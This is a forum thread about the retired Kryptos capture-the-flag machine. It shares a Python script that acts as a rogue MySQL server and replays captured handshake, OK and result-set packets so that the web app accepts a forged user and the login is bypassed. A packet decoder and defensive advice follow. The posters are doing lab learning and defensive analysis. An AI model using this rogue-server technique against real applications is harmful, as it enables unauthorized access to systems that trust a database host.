Use the script as a particular MySQL server to bypass Kryptos login

Kryptos retired and I didn't get user, stuck at the encrypt part.
Thanks for @limbernie & @n1b1ru's help. I requested both of you to respond, but I couldn't solve it eventually. Well, I'm C136Rick, not @0xRick (you know what I mean) :p.
And thanks @no0ne & @Adamm for making it, I like it.

Here is what I did. I just copied the MySQL responses into the program by analyzing captured MySQL network data with Wireshark. When that request's parameter (db) was set and sent in Burp, I ran the program and got a 302, which means it worked.

import socket
import logging

logging.basicConfig(level=logging.DEBUG)

if __name__ == '__main__':

    # Listen on the MySQL port; the web app connects here instead of the real server
    sock = socket.socket()
    sock.bind(("0.0.0.0", 3306))
    sock.listen(5)

    con, addr = sock.accept()

    logging.info('Connect from: %r', addr)
    # Wireshark Info: Server Greeting proto=10 version=5.5.53
    # (handshake replayed from the capture, auth plugin mysql_native_password)
    con.sendall(b"\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
    con.recv(2048)

    logging.info("Wireshark Info: Login Request user=dbuser db=cryptor")
    # Wireshark Info: Response OK (the login request is answered with OK regardless of its content)
    con.sendall(b"\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
    con.recv(2048)

    logging.info("Wireshark Info: Request Query")
    # Wireshark Info: Response. A result set with the columns username, password
    # and a single row (dbuser, dbuser), so the app's SELECT finds a matching user
    con.sendall(b"\x01\x00\x00\x01\x02\x37\x00\x00\x02\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x37\x00\x00\x03\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00\x05\x00\x00\x04\xfe\x00\x00\x22\x00\x0e\x00\x00\x05\x06\x64\x62\x75\x73\x65\x72\x06\x64\x62\x75\x73\x65\x72\x05\x00\x00\x06\xfe\x00\x00\x22\x00")
    con.recv(2048)

    logging.info("Wireshark Info: Request Quit")
    logging.info("done!")
    con.close()

@C136Rick said:

ohhh

You can still continue to work on it even though Kryptos has retired.

@limbernie said:

You can still continue to work on it even though Kryptos has retired.

Knew it, and thanks for the response.

Nice work, I haven't done Kryptos, watched the ippsec video. Could you comment your code about the hex values?

@peek said:

nice work, i havent done Kryptos, watched ippsec video. Could you comment your code about the hex values ?

It's all about MySQL's data.
Here is the TCP stream from Wireshark, just ignore "username" and "password".

J...
5.5.53.....nz;Tvsaj...!...............pv!=P\Z2*zI?.mysql_native_password.Z...........!.......................dbuser..-!.n.>.s!#..M..?....cryptor.mysql_native_password............m....SELECT username, password FROM users WHERE username='11111' AND password='1bbd886460827015e5d605ed44252251' .....7....def.cryptor.users.users.username.username.!...........7....def.cryptor.users.users.password.password.!.................."......dbuser.dbuser......."......
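To make the hex values in the replay script readable, here is an added example (my own code, not C136Rick's script and not anything from the Kryptos box) that decodes the three server messages the script sends, using the documented MySQL client/server packet layout: the v10 handshake, the OK packet that answers the login request, and the text result set that answers the SELECT. The byte strings are copied verbatim from the script above; the field names and the two capability-bit constants are the standard protocol ones, and the function names are mine.

```python
import struct

# Packet bytes copied from the replay script above (a Wireshark capture of the real server).
GREETING = b"\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00"
OK_PACKET = b"\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00"
RESULT_SET = (
    b"\x01\x00\x00\x01\x02"  # column count = 2
    b"\x37\x00\x00\x02\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00"  # column definition: username
    b"\x37\x00\x00\x03\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00"  # column definition: password
    b"\x05\x00\x00\x04\xfe\x00\x00\x22\x00"  # EOF after the column definitions
    b"\x0e\x00\x00\x05\x06\x64\x62\x75\x73\x65\x72\x06\x64\x62\x75\x73\x65\x72"  # one row: dbuser, dbuser
    b"\x05\x00\x00\x06\xfe\x00\x00\x22\x00"  # EOF after the rows
)
CLIENT_SSL = 0x00000800          # capability bit: server would accept a TLS upgrade
CLIENT_PLUGIN_AUTH = 0x00080000  # capability bit: auth plugin name follows the salt

def split_packets(stream):
    """Cut a stream into (sequence_id, payload) pairs: 3-byte LE length, 1-byte sequence id, payload."""
    packets, pos = [], 0
    while pos < len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        payload = stream[pos + 4:pos + 4 + length]
        if len(payload) != length:
            raise ValueError("truncated packet at offset %d" % pos)
        packets.append((stream[pos + 3], payload))
        pos += 4 + length
    return packets

def read_lenenc_int(buf, pos):
    """Length-encoded integer: one byte below 0xfb, else a 0xfc/0xfd/0xfe prefix and 2/3/8 bytes."""
    first = buf[pos]
    if first < 0xfb:
        return first, pos + 1
    width = {0xfc: 2, 0xfd: 3, 0xfe: 8}[first]
    return int.from_bytes(buf[pos + 1:pos + 1 + width], "little"), pos + 1 + width

def read_lenenc_str(buf, pos):
    """Length-encoded string; in a row packet the single byte 0xfb means a NULL cell."""
    if buf[pos] == 0xfb:
        return None, pos + 1
    n, pos = read_lenenc_int(buf, pos)
    return buf[pos:pos + n].decode(), pos + n

def parse_handshake(payload):
    """Protocol::HandshakeV10, the first message a client sees (payload[0] == 10)."""
    end = payload.index(b"\x00", 1)
    version, pos = payload[1:end].decode(), end + 1
    conn_id = struct.unpack_from("<I", payload, pos)[0]
    salt1 = payload[pos + 4:pos + 12]            # auth_plugin_data_part_1, then one filler byte
    pos += 13
    cap_lo, charset, status, cap_hi = struct.unpack_from("<HBHH", payload, pos)
    caps, auth_len = cap_lo | (cap_hi << 16), payload[pos + 7]
    pos += 8 + 10                                # those fields, then 10 reserved bytes
    salt2_len = max(13, auth_len - 8)            # auth_plugin_data_part_2, NUL-terminated
    salt2, pos = payload[pos:pos + salt2_len], pos + salt2_len
    plugin = payload[pos:payload.index(b"\x00", pos)].decode() if caps & CLIENT_PLUGIN_AUTH else None
    return {"server_version": version, "connection_id": conn_id, "charset": charset,
            "salt": (salt1 + salt2)[:auth_len - 1], "status_flags": status,
            "tls_offered": bool(caps & CLIENT_SSL), "auth_plugin": plugin}

def parse_ok(payload):
    """OK_Packet (payload[0] == 0): affected rows, last insert id, status flags, warnings."""
    affected, pos = read_lenenc_int(payload, 1)
    last_id, pos = read_lenenc_int(payload, pos)
    status, warnings = struct.unpack_from("<HH", payload, pos)
    return {"affected_rows": affected, "last_insert_id": last_id,
            "status_flags": status, "warnings": warnings}

def parse_result_set(stream):
    """Text result set: column count, column definitions, EOF, rows, EOF."""
    packets = iter(split_packets(stream))
    ncols, _ = read_lenenc_int(next(packets)[1], 0)
    columns = []
    for _ in range(ncols):
        p, pos, names = next(packets)[1], 0, []
        for _ in range(6):                       # catalog, schema, table, org_table, name, org_name
            s, pos = read_lenenc_str(p, pos)
            names.append(s)
        columns.append({"schema": names[1], "table": names[2], "name": names[4]})
    next(packets)                                # EOF packet after the column definitions
    rows = []
    for _, p in packets:
        if p[0] == 0xfe and len(p) < 9:          # EOF packet ends the rows
            break
        row, pos = [], 0
        for _ in range(ncols):
            cell, pos = read_lenenc_str(p, pos)
            row.append(cell)
        rows.append(row)
    return columns, rows

def decode_login_flow():
    handshake = parse_handshake(split_packets(GREETING)[0][1])
    ok = parse_ok(split_packets(OK_PACKET)[0][1])
    columns, rows = parse_result_set(RESULT_SET)
    return {"handshake": handshake, "ok": ok, "columns": [c["name"] for c in columns], "rows": rows}

if __name__ == "__main__":
    print(decode_login_flow())
```

Running it shows what the web app actually saw: a 5.5.53 server offering mysql_native_password with a 20-byte salt and no CLIENT_SSL bit, an OK packet with status flag 0x0002 (autocommit), and a result set from cryptor.users with one row, dbuser/dbuser. Nothing in that exchange lets the client check who it is talking to, which is the defensive takeaway: an application whose database host can be influenced by a request parameter, and which connects without TLS and server-certificate verification, will treat any row a listener on port 3306 returns as a real user. Pinning the database host in configuration and requiring a verified TLS connection closes that path.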

thanks